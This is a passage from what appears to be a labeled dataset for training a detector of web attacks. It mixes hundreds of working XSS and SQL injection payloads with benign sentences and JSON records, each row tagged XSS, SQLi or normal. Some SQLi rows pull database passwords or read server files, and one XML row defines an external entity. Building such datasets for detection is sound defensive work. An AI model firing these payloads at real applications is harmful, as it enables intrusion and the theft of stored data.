) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( ( ""%"" = """,2,SQLi,11159 <small id=x tabindex=1 onfocus=alert(1)></small>,1,XSS,6050 "<content onmouseout=""alert(1)"">test</content>",1,XSS,6635 1' ) where 9159 = 9159,2,SQLi,21411 <em id=x tabindex=1 onbeforeactivate=alert(1)></em>,1,XSS,5446 if ( 4907 = 9581 ) select 4907 else drop function apqw--,2,SQLi,17727 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19",2,SQLi,13795 <input onchange=alert(1) value=xss>,1,XSS,8981 "-6618"" ) ) ) order by 1#",2,SQLi,21209 -1564' ) order by 1--,2,SQLi,21611 1' ) ) as cyom where 2318 = 2318 and 7533 = 7533--,2,SQLi,18500 ></select><script>alert(123)</script>,1,XSS,8564 "1"" ) and elt ( 4249 = 4249,7259 ) and ( ""xgka"" like ""xgka",2,SQLi,17551 <rb id=x tabindex=1 onbeforedeactivate=alert(1)></rb><input autofocus>,1,XSS,2550 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#",2,SQLi,11656 "<style>:target {transform: rotate(180deg);}</style><data id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></data>",1,XSS,644 Join yoga class.,3,normal,22811 "-4695' ) ) ) union all select 5844,5844,5844,5844,5844,5844#",2,SQLi,17205 "<frameset onpaste=""alert(1)"" contenteditable>test</frameset>",1,XSS,3471 "1"" ) ) as vigs where 6175 = 6175 or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,11067 Where's your SQL skill?,3,normal,23403 "<math href=""javascript:javascript:alert(1)"">CLICKME</math> <math> <maction actiontype=""statusline#http://google.com"" xlink:href=""javascript:javascript:alert(1)"">CLICKME</maction> </math>",1,XSS,144 <svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />,1,XSS,2400 select sleep ( 5 ) and ( 'vwmx' = 'vwmx,2,SQLi,19637 "<samp draggable=""true"" ondragstart=""alert(1)"">test</samp>",1,XSS,4066 "<nextid oncut=""alert(1)"" contenteditable>test</nextid>",1,XSS,4783 --></noscript></noembed></template></title></textarea></style><script>alert()</script>,1,XSS,1860 having 1 = 1--,2,SQLi,22207 <address onpointermove=alert(1)>XSS</address>,1,XSS,6582 "{""id"":null,""firstName"":""Jane"",""lastName"":""Koh"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27223 <source id=x tabindex=1 onbeforeactivate=alert(1)></source>,1,XSS,3725 "1' ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( 'qdhz' = 'qdhz",2,SQLi,12559 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i",2,SQLi,11954 1' ) where 6305 = 6305 rlike ( select ( case when ( 8326 = 9749 ) then 1 else 0x28 end ) ) --,2,SQLi,14493 "<style>@keyframes x{}</style><noscript style=""animation-name:x"" onanimationend=""alert(1)""></noscript>",1,XSS,1402 <command id=x tabindex=1 onbeforeactivate=alert(1)></command>,1,XSS,3357 "<style>:target {transform: rotate(180deg);}</style><figcaption id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></figcaption>",1,XSS,523 <svg><bgsound onload=alert(1)></bgsound>,1,XSS,7862 <basefont id=x tabindex=1 onactivate=alert(1)></basefont>,1,XSS,4032 "1' ) ) ) or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13051 Where did you find that serene garden?,3,normal,23883 "{""id"":null,""name"":""hung""}",3,normal,26826 "{""id"":null,""name"":""subject""}",3,normal,27156 "1' and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and 'tfso' = 'tfso",2,SQLi,13080 Select a color.,3,normal,24816 Create a captivating poem.,3,normal,22699 1' in boolean mode ) waitfor delay '0:0:5'#,2,SQLi,19179 Create a plan.,3,normal,22841 "-2726"" ) ) or elt ( 1032 = 1032,3623 ) and ( ( ""ococ"" = ""ococ",2,SQLi,17027 "1"" ) where 4567 = 4567 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14479 "To copy an article, simply left click and drag the mouse pointer to select the desired text.",3,normal,25282 "1"" ) where 1699 = 1699 or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12960 "<kbd onclick=""alert(1)"">test</kbd>",1,XSS,9252 "Instead of dragging around handles, Android will automatically recognize when you're trying to select distinct things like phone numbers and addresses and select the entire item when you double tap it.",3,normal,25988 "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--",2,SQLi,15009 Be sure to select the right gender and age group in order to have a chart that suits your child.,3,normal,26336 "{""id"":null,""name"":""student having""}",3,normal,27265 "<style>:target {color: red;}</style><style id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></style>",1,XSS,874 "<div id=""62""><!-- IE 6-8 -->",1,XSS,9633 create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;,2,SQLi,13920 or 1=1 or ''=',2,SQLi,22190 "<command ondblclick=""alert(1)"">test</command>",1,XSS,6661 1 or 1=1,2,SQLi,22492 <abbr id=x tabindex=1 onfocusin=alert(1)></abbr>,1,XSS,6030 <u onblur=alert(1) tabindex=1 id=x></u><input autofocus>,1,XSS,4233 "-1475"" ) union all select 8611,8611,8611#",2,SQLi,19377 "><script+src=https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback=confirm(1);//jQuery20108887725116629929_1528071050373472232&_=1528071050374""></script>",1,XSS,308 "1"" ) as rcnk where 1800 = 1800",2,SQLi,20546 "-1235"" ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ""ahhz"" like ""ahhz",2,SQLi,9969 Specify filters where necessary.,3,normal,23347 "1"" ) ) as qqhm where 7182 = 7182",2,SQLi,20329 Where's the taxi stand?,3,normal,23504 <head id=x tabindex=1 onbeforedeactivate=alert(1)></head><input autofocus>,1,XSS,2278 "1%"" ) ) ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15155 <script onfocusout=alert(1) tabindex=1 id=x></script><input autofocus>,1,XSS,2540 "<tt onbeforecut=""alert(1)"" contenteditable>test</tt>",1,XSS,5183 1'|| ( select 'npdx' from dual where 9486 = 9486 and sleep ( 5 ) ) ||',2,SQLi,16214 -1087 ) where 5787 = 5787 union all select 5787#,2,SQLi,18726 <menuitem id=x tabindex=1 onbeforedeactivate=alert(1)></menuitem><input autofocus>,1,XSS,1926 1 ) as afxc where 7497 = 7497,2,SQLi,20757 "select * from users where id = '1' union select $*$,@@VERSION -- 1'",2,SQLi,16459 "-7795"" ) where 1712 = 1712 union all select 1712,1712,1712,1712#",2,SQLi,16758 "-4711' in boolean mode ) union all select 8007,8007,8007,8007,8007,8007--",2,SQLi,15870 Congratulations to those very good guys and @JulienMid for being selected in Team @Value247 for the upcoming Tournament of Legends or Rivals!... Will Jessica secure the three-peat? Will Julien pick in his first championship? Ask them next week!...,3,normal,26509 <multicol onpointerdown=alert(1)>XSS</multicol>,1,XSS,6210 "<u onclick=""alert(1)"">test</u>",1,XSS,9546 "-9845"" ) as xpis where 1936 = 1936 or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11394 "{""id"":null,""name"":""Immortal Jellyfish""}",3,normal,27205 "1"" ) ) ) union all select null,null,null,null,null,null,null#",2,SQLi,17073 "<rb onbeforecut=""alert(1)"" contenteditable>test</rb>",1,XSS,5163 "-4817 union all select 7415,7415,7415,7415,7415,7415,7415,7415,7415#",2,SQLi,16378 <tr onpointerdown=alert(1)>XSS</tr>,1,XSS,9061 "<textarea onmouseenter=""alert(1)"">test</textarea>",1,XSS,5821 The writer therefore questioned the Guardians ' ability and judgment to ever select an acceptable candidate.,3,normal,25360 AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i,2,SQLi,15238 "<kbd onbeforepaste=""alert(1)"" contenteditable>test</kbd>",1,XSS,4303 "1"" ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,17193 -8716' ) where 5523 = 5523 or 3686 = 8485--,2,SQLi,19215 "1' ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( 'sucj' = 'sucj",2,SQLi,10665 -7369 or 9323 = 9323#,2,SQLi,21629 <u onpointerdown=alert(1)>XSS</u>,1,XSS,9380 1'+ ( select 'sfko' where 6853 = 6853 rlike sleep ( 5 ) #,2,SQLi,17498 "AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND 1337""=""1337",2,SQLi,17009 "<plaintext onmouseup=""alert(1)"">test</plaintext>",1,XSS,5938 "1%"" ) ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ""%"" = """,2,SQLi,10480 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rtc id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></rtc>",1,XSS,262 "{""id"":null,""firstName"":""Pei"",""lastName"":""Kwan"",""address"":""1 Robin Walk"",""city"":""528"",""telephone"":""4210882122""}",3,normal,27470 "-7485%' ) ) ) union all select 1303,1303,1303,1303,1303,1303,1303,1303,1303--",2,SQLi,15423 "1' ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) )",2,SQLi,17841 1 ) where 1929 = 1929 and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) --,2,SQLi,15371 Determine values where applicable.,3,normal,23293 "<style>:target {color: red;}</style><xmp id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></xmp>",1,XSS,1093 AND (SELECT 3122 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337,2,SQLi,16910 <picture onpointerout=alert(1)>XSS</picture>,1,XSS,6934 /><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />,1,XSS,4651 1' and 5835 = 6157 and 'bjee' like 'bjee,2,SQLi,19543 Select quickly.,3,normal,24487 or'1=1,2,SQLi,22531 <head id=x tabindex=1 onfocusin=alert(1)></head>,1,XSS,6002 "<aside onmouseenter=""alert(1)"">test</aside>",1,XSS,7145 <tt onpointermove=alert(1)>XSS</tt>,1,XSS,9028 javascript\x0A:javascript:confirm(1),1,XSS,8964 Select the best wedding vows.,3,normal,24383 "<hr onclick=""alert(1)"">test</hr>",1,XSS,9447 Select your trend.,3,normal,24893 Select dinner.,3,normal,24506 Then they use data analysis to select their ideal hires.,3,normal,25347 1'+ ( select 'xbyn' where 6881 = 6881,2,SQLi,19896 "<ul onmouseout=""alert(1)"">test</ul>",1,XSS,9093 "1"" or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )",2,SQLi,13437 "1%"" ) and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13487 "<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:///dev/random"">]><foo>&xee;</foo>",1,XSS,534 "<script>if(""x\\xE0\xB9\x92"".length==2) { javascript:alert(1);}</script>",1,XSS,2419 "<nobr onbeforecopy=""alert(1)"" contenteditable>test</nobr>",1,XSS,4043 "<samp onkeydown=""alert(1)"" contenteditable>test</samp>",1,XSS,4678 <col onfocusout=alert(1) tabindex=1 id=x></col><input autofocus>,1,XSS,2923 "1%"" and sleep ( 5 ) and ""%"" = """,2,SQLi,20469 &lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt;,1,XSS,2251 "<u draggable=""true"" ondragstart=""alert(1)"">test</u>",1,XSS,5481 1' ) ) as wdor where 7426 = 7426,2,SQLi,20342 "<div draggable=""true"" contenteditable>drag me</div><span ondragover=alert(1) contenteditable>drop here</span>",1,XSS,1052 "||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||'",2,SQLi,15311 "Select the ""Mark as read"" icon from the top toolbar.",3,normal,25608 "<rb onclick=""alert(1)"">test</rb>",1,XSS,9460 "<style>@keyframes x{}</style><dir style=""animation-name:x"" onanimationend=""alert(1)""></dir>",1,XSS,1720 "<data draggable=""true"" ondrag=""alert(1)"">test</data>",1,XSS,5275 1 ) where 8616 = 8616 and 2006 = 2006,2,SQLi,19909 "1' ) as woka where 4316 = 4316 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12408 "&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;",1,XSS,2461 "1', ( select 9100 = ( 'qqpjq'|| ( select case 9100 when 9100 then 1 else 0 end from rdb$database ) ||'qzvzq' ) )",2,SQLi,13509 "<nextid onmousemove=""alert(1)"">test</nextid>",1,XSS,6796 "1%"" ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ""%"" = """,2,SQLi,10571 "<svg onmouseout=""alert(1)"">test</svg>",1,XSS,8624 "1' ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( 'xgzb' = 'xgzb",2,SQLi,11182 cursor,3,normal,23165 "Home Depot: Up to 40% off select kitchen and bath essentials; up to 30% off select window blinds and shades, and select storage solutions.",3,normal,26095 "1%' ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( '%' = '",2,SQLi,16091 Select confirm.,3,normal,24570 "union (select NULL, NULL, NULL, (select @@version)) --",2,SQLi,17846 ’ or ‘1’=’1,2,SQLi,21923 &lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt;,1,XSS,761 "-2948' ) ) or make_set ( 9354 = 9354,7185 ) and ( ( 'ivwt' = 'ivwt",2,SQLi,16616 "-8810' ) or make_set ( 9354 = 9354,7185 ) and ( 'prsn' like 'prsn",2,SQLi,16664 "<li draggable=""true"" ondragend=""alert(1)"">test</li>",1,XSS,5489 "1%' ) ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13473 "<output draggable=""true"" ondragstart=""alert(1)"">test</output>",1,XSS,3340 A select company of these met at the parsonage on Sunday afternoons.,3,normal,26424 "1"" where 5039 = 5039 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11224 Select your route.,3,normal,24836 <aside id=x tabindex=1 onfocus=alert(1)></aside>,1,XSS,6062 "1'+ ( select sged where 1181 = 1181 or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) ) +'",2,SQLi,11966 -7103 ) ) or 4610 = 1871 and ( ( 1249 = 1249,2,SQLi,19090 "<button onmouseleave=""alert(1)"">test</button>",1,XSS,6624 "1 ) as dqda where 1624 = 1624 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14069 <progress id=x tabindex=1 onfocusin=alert(1)></progress>,1,XSS,4350 Sort results where specified.,3,normal,23266 "<video onmouseover=""alert(1)"">test</video>",1,XSS,7473 "<header draggable=""true"" ondragend=""alert(1)"">test</header>",1,XSS,3693 "<i draggable=""true"" ondragend=""alert(1)"">test</i>",1,XSS,5769 "1' where 2162 = 2162 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,12714 "<strong onkeyup=""alert(1)"" contenteditable>test</strong>",1,XSS,4397 "<li oncopy=""alert(1)"" contenteditable>test</li>",1,XSS,6207 "<section onbeforepaste=""alert(1)"" contenteditable>test</section>",1,XSS,2905 "javascript://'/</title></style></textarea></script>--><p"" onclick=alert()//>*/alert()/*",1,XSS,1841 "1' ) as najc where 5213 = 5213 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) --",2,SQLi,12210 "-5160' ) union all select 8067,8067,8067,8067,8067,8067,8067--",2,SQLi,16994 Select view.,3,normal,24613 ") RLIKE SLEEP(5) AND (1337""=""1337",2,SQLi,20188 select * from users where id = 1 % ( 1 ) or 1 = 1 -- 1,2,SQLi,17926 "xss""><!--><svg/onload=alert(document.domain)>",1,XSS,6761 "<marquee onkeypress=""alert(1)"" contenteditable>test</marquee>",1,XSS,3341 "<link onpaste=""alert(1)"" contenteditable>test</link>",1,XSS,5214 "-4329' ) union all select 1353,1353,1353,1353,1353,1353#",2,SQLi,17732 "1 ) as mnyy where 4409 = 4409 union all select null,null,null,null--",2,SQLi,16397 "<style>:target {transform: rotate(180deg);}</style><aside id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></aside>",1,XSS,622 "<style>@keyframes x{}</style><span style=""animation-name:x"" onanimationend=""alert(1)""></span>",1,XSS,1658 "<Img src = x onerror = ""javascript: window.onerror = alert; throw "">",1,XSS,2630 Filter the irrelevant data from the report.,3,normal,22963 Select the best course for your studies.,3,normal,24208 "1'|| ( select 'qwoo' from dual where 8802 = 8802 or elt ( 6272 = 6272,sleep ( 5 ) ) ) ||'",2,SQLi,14724 "1 ) union all select null,null,null,null#",2,SQLi,19368 "1'|| ( select 'ryyc' from dual where 5196 = 5196 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) ) ||'",2,SQLi,10927 "-2333' union all select 9714,9714,9714--",2,SQLi,19497 "<base href=""javascript:/a/-alert(1)///////""><a href=../lol/safari.html>test</a>",1,XSS,2001 "Go to Facebook, and select Apps from the left hand menu.",3,normal,26144 "1"" where 9889 = 9889",2,SQLi,21769 "<samp onbeforepaste=""alert(1)"" contenteditable>test</samp>",1,XSS,3883 "-6554' ) ) ) union all select 4384,4384,4384,4384,4384#",2,SQLi,17777 "{""id"":null,""name"":""Purrloin""}",3,normal,27218 "-1015"" ) ) union all select 6624,6624#",2,SQLi,19724 There are two voting rounds to select a new French president.,3,normal,25337 "xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\""XSS\""))'&gt;",1,XSS,4217 "1, ( select ( case when ( 5777 = 5777 ) then 1 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual )",2,SQLi,13497 "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--",2,SQLi,14811 "1 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13485 "{""id"":null,""firstName"":""Ddaania"",""lastName"":""Lisa"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26967 1%' ) ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( ( '%' = ',2,SQLi,15428 "1"" where 5552 = 5552 or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11538 "<spacer onmouseout=""alert(1)"">test</spacer>",1,XSS,7227 "<style>@keyframes x{}</style><var style=""animation-name:x"" onanimationend=""alert(1)""></var>",1,XSS,1725 "<input onbeforepaste=alert(1) value="""" autofocus>",1,XSS,5749 "<;A HREF="";http://www.google.com./"";>;XSS<;/A>;",1,XSS,6106 Carefully select your honeymoon itinerary.,3,normal,24399 "<hr onmouseover=""alert(1)"">test</hr>",1,XSS,8817 "<a href=""javas\x02cript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2409 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#",2,SQLi,15002 "<video onbeforepaste=""alert(1)"" contenteditable>test</video>",1,XSS,3467 I want to select a book to read during my vacation.,3,normal,23686 "1 and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )",2,SQLi,10921 1'+ ( select bgbq where 1589 = 1589 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) ) +',2,SQLi,10387 "{""id"":null,""name"":""six""}",3,normal,27256 1' ) where 8142 = 8142 waitfor delay '0:0:5'--,2,SQLi,18961 Where's your SQL skill set?,3,normal,23401 You have pictures taken of you and then you select them.,3,normal,25074 "<style>@keyframes slidein {}</style><tr style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></tr>",1,XSS,445 "1' ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ( 'zizo' like 'zizo",2,SQLi,16438 "select pg_sleep ( 5 ) and ( ( ( ""nvuv"" like ""nvuv",2,SQLi,18560 "<div draggable=""true"" contenteditable>drag me</div><section ondrop=alert(1) contenteditable>drop here</section>",1,XSS,974 "<style>@keyframes slidein {}</style><image style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></image>",1,XSS,378 "1' ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( ( 'xuwl' like 'xuwl",2,SQLi,11676 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14",2,SQLi,18535 "<style>:target {color: red;}</style><iframe id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></iframe>",1,XSS,827 "<style>:target {transform: rotate(180deg);}</style><th id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></th>",1,XSS,706 "It is merely necessary to select some larger or smaller unit as the subject of observation--as criticism has every right to do, seeing that whatever unit history observes must always be arbitrarily selected.",3,normal,25967 1' where 2690 = 2690,2,SQLi,21840 1'+ ( select ggah where 3263 = 3263 and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) ) +',2,SQLi,12228 <body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>,1,XSS,2657 "{""id"":null,""firstName"":""Ryan Low Low"",""lastName"":""Low"",""address"":""11 Kaki Bukit Road 1, 02-08 Eunos Technolink"",""city"":""264"",""telephone"":""12345678""}",3,normal,26857 "1"" and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ""icow"" like ""icow",2,SQLi,13166 "1 ) ) as cvid where 4381 = 4381 union all select null,null--",2,SQLi,17208 "<div id=""132""><!doctype html>",1,XSS,9595 1'|| ( select 'tezo' from dual where 4436 = 4436,2,SQLi,18746 "1' or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 )",2,SQLi,14054 1 where 5443 = 5443,2,SQLi,21978 "<style>:target {color:red;}</style><wbr id=x style=""transition:color 1s"" ontransitionend=alert(1)></wbr>",1,XSS,1293 "1"" ) ) as wooq where 7671 = 7671 and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --",2,SQLi,10553 Select verify.,3,normal,24571 "<IMG SRC=x onemptied=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3444 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and 'hmqd' = 'hmqd",2,SQLi,14189 1' rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ),2,SQLi,17385 <content onpointerout=alert(1)>XSS</content>,1,XSS,6823 """+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--",2,SQLi,17463 "1"" or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ""pwwb"" like ""pwwb",2,SQLi,16207 "-1418"" ) where 7528 = 7528 order by 1#",2,SQLi,19697 "<body onblur body onblur=""javascript:javascript:alert(1)""></body onblur>",1,XSS,2339 <big onpointerover=alert(1)>XSS</big>,1,XSS,8641 "<h1 draggable=""true"" ondragleave=""alert(1)"">test</h1>",1,XSS,4874 "<blockquote oncopy=""alert(1)"" contenteditable>test</blockquote>",1,XSS,3068 <s id=x tabindex=1 onfocus=alert(1)></s>,1,XSS,7985 except,3,normal,23190 1'|| ( select 'ogyu' from dual where 6691 = 6691,2,SQLi,18759 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#",2,SQLi,13837 "1"" ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ""qpzj"" like ""qpzj",2,SQLi,13017 "<summary onkeyup=""alert(1)"" contenteditable>test</summary>",1,XSS,3911 "1%' ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ( '%' = '",2,SQLi,12798 end and 'hizd' = 'hizd,2,SQLi,21545 <a id=x tabindex=1 onbeforedeactivate=alert(1)></a><input autofocus>,1,XSS,2641 "1%' ) and elt ( 4670 = 9403,9403 ) and ( '%' = '",2,SQLi,18696 "<style>:target {transform: rotate(180deg);}</style><rb id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></rb>",1,XSS,705 "<image oncut=""alert(1)"" contenteditable>test</image>",1,XSS,5174 <frameset id=x tabindex=1 onbeforedeactivate=alert(1)></frameset><input autofocus>,1,XSS,1936 "1"" ) ) ) and sleep ( 5 ) and ( ( ( ""bvgg"" = ""bvgg",2,SQLi,18602 "1'+ ( select ocvc where 6981 = 6981 union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,13946 "<audio draggable=""true"" ondrag=""alert(1)"">test</audio>",1,XSS,4696 "1%"" ) union all select null,null,null,null,null--",2,SQLi,18587 <aside onpointerover=alert(1)>XSS</aside>,1,XSS,7744 <param id=x tabindex=1 onfocusin=alert(1)></param>,1,XSS,5528 Insert the SIM card.,3,normal,22647 "<iframe onclick=""alert(1)"">test</iframe>",1,XSS,8034 "select * from users where id = '1' union select null,banner from v$version where rownum = 1 -- 1'",2,SQLi,14249 "<multicol onbeforecopy=""alert(1)"" contenteditable>test</multicol>",1,XSS,2806 <cite onpointermove=alert(1)>XSS</cite>,1,XSS,8275 "-5278"" ) ) ) union all select 5264,5264,5264#",2,SQLi,19021 1' ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ),2,SQLi,17413 AS INJECTX WHERE 1=1 AND 1=0,2,SQLi,20790 "<tr onmouseleave=""alert(1)"">test</tr>",1,XSS,8656 "<style>@im\port'\ja\vasc\ript:alert(\""XSS\"")';</style>",1,XSS,4663 "<hr onmousemove=""alert(1)"">test</hr>",1,XSS,8948 "1 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, 